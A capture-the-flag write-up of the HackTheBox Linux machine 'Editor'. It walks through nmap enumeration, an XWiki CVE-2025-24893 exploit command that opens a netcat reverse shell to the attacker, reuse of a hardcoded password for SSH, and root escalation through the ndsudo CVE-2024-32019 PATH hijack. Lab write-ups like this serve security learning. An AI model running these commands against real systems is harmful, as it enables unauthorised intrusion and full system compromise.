INICIANDO MÓDULOS DEL SISTEMA...0%
mem: 0x0000pid: 1000
~/aeth3ron
SYSTEM ONLINE

v2.0.4 // SECURE
~ / ops / editor.md

Editor

17 de febrero de 2025 | HackTheBox | easy
#linux #xwiki #cve-2025-24893 #suid #cve-2024-32019
Portada de Editor

Details

  • OS: Linux
  • Difficulty: Easy
  • IP Address: 10.10.11.80
  • Author: AETH3RON

Overview

Editor is an easy-difficulty Linux machine that exposes vulnerable services leading to remote code execution. The initial foothold is obtained by identifying a vulnerable version of XWiki affected by CVE-2025-24893, which allows RCE. After gaining access, we discover exposed credentials that can be used to establish an SSH connection. Privilege escalation is achieved through the abuse of an SUID binary, ultimately granting full root access.

Enumeration

Nmap

nmap -Pn -sS -sV -p- 10.10.11.80 -oN nmap-basic
Nmap Basic Scan 
nmap -Pn -sS -sV -sC -p22,80,8080 10.10.11.80 -oN nmap-common
Nmap Common Scan

From the port scan, we observe three open ports. Port 22 is running SSH, port 80 is running nginx, and port 8080 is hosting a Jetty web server.

When browsing the service on port 8080, we identify an outdated XWiki instance that exposes its version:

XWiki Version Disclosure

Foothold

By analyzing the XWiki 15.10.8 instance, we identify that the application is vulnerable to CVE-2025-24893.

This vulnerability is caused by unsafe Groovy expression handling inside the SolrSearch macro. An attacker can inject Groovy code through a crafted GET request, leading to remote code execution.

We can trigger the exploit using the following command:

python3 CVE-2025-24893.py -t 'http://10.10.XX.XX:8080' -c 'busybox nc 10.10.XX.XX 9001 -e /bin/bash'

A few seconds later, we receive an incoming connection on our Netcat listener, confirming remote code execution.

RCE Confirmation

Lateral Movement

Once inside the machine, we enumerate the filesystem and discover an interesting configuration file named hibernate.cfg.xml.

By inspecting its contents, we extract a hardcoded password that appears to correspond to the user oliver, based on the entries found in /etc/passwd.

Exposed Credentials

With valid credentials, we can now log into the system via SSH as Oliver.

SSH Access as Oliver

Privilege Escalation

While enumerating SUID binaries on the system, we identify the ndsudo binary, which is owned by root and has the SUID bit set:

find / -user root -perm -4000 -print 2>/dev/null

Among the results, the following entry stands out: /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo

SUID Binary Enumeration

After researching the binary, we discover that ndsudo is vulnerable to CVE-2024-32019, which allows local privilege escalation due to improper input validation and insecure handling of privileged operations.

This vulnerability can be exploited to execute arbitrary commands as root, ultimately granting full system compromise. To exploit this issue, we download a working proof-of-concept and compile it:

gcc poc.c -o nvme

We then transfer the compiled binary to the target machine and execute it:

scp nvme oliver@10.10.11.80:/tmp/
chmod +x nvme
export PATH=/tmp:$PATH
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

After execution, we successfully obtain a root shell and complete the privilege escalation.

Root Shell Access

References

Volver a /ops